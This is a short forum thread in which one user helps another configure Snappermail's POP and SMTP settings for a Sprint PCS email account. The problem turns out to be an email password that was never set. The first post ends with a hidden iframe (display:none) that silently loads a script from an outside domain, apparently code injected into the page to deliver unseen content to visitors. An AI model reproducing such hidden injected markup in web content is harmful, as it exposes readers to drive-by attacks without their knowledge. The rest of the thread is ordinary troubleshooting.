+ Reply to Thread
Results 1 to 10 of 10
  1. #1
    Registered User ycats's Avatar
    Join Date
    09-26-2002
    Location
    Antioch, Tennessee
    Posts
    891

    Sprintpcs email.........Snappermail config.

    I'm trying to get Snappermail to send email, but keep getting error messages (authentication failed, bad username/password).
    If i have a Sprint email address, what's my username? is it my phone number or the first part of my Sprintpcs email address?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User ericp74's Avatar
    Join Date
    07-14-2003
    Location
    West Palm Beach, Florida
    Posts
    204
    You need to setup an account at www.sprintpcs.com first and use that for your outgoing mail.

  3. #3
    Registered User ycats's Avatar
    Join Date
    09-26-2002
    Location
    Antioch, Tennessee
    Posts
    891
    I do, it's webbstacy@sprintpcs.com.

    What I'm wondering is under SMTP settings, is "webbstacy" my username or is it my ten digit phone number?

  4. #4
    Registered User ericp74's Avatar
    Join Date
    07-14-2003
    Location
    West Palm Beach, Florida
    Posts
    204
    Your SMTP settings should be:
    Incoming (Pop): pop.sprintpcs.com
    Outgoing (SMTP): smtp.sprintpcs.com

  5. #5
    Registered User ycats's Avatar
    Join Date
    09-26-2002
    Location
    Antioch, Tennessee
    Posts
    891
    I did that and left the username and password fields blank.

    Here's what I get:

    Authorising SMTP
    SMTP Rcpt To: command failed:
    530 5.7.1 Relaying not allowed:

  6. #6
    Registered User ericp74's Avatar
    Join Date
    07-14-2003
    Location
    West Palm Beach, Florida
    Posts
    204
    You need to type in your Username and password to send email thru the sprint network.

    Your username is: webbstacy
    pasword is: XXXXXX?

  7. #7
    Registered User ycats's Avatar
    Join Date
    09-26-2002
    Location
    Antioch, Tennessee
    Posts
    891
    did that....................get a "bad username or password (authentication failed)" message.

    I think the problem may be the password...............am I supposed to use the password that I have for logging into my Sprintpcs account (account password)?.......that's what I used.

  8. #8
    Registered User ericp74's Avatar
    Join Date
    07-14-2003
    Location
    West Palm Beach, Florida
    Posts
    204
    When you setup your sprint account. Didn't you choose a different password for email. If not or you forgot, log onto sprint, go into your email settings and change it or have it sent to your primary email account.

  9. #9
    Registered User ycats's Avatar
    Join Date
    09-26-2002
    Location
    Antioch, Tennessee
    Posts
    891
    THANKS!
    I had never setup an email password.........and this was the issue.

  10. #10
    Registered User ericp74's Avatar
    Join Date
    07-14-2003
    Location
    West Palm Beach, Florida
    Posts
    204
    kewl

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts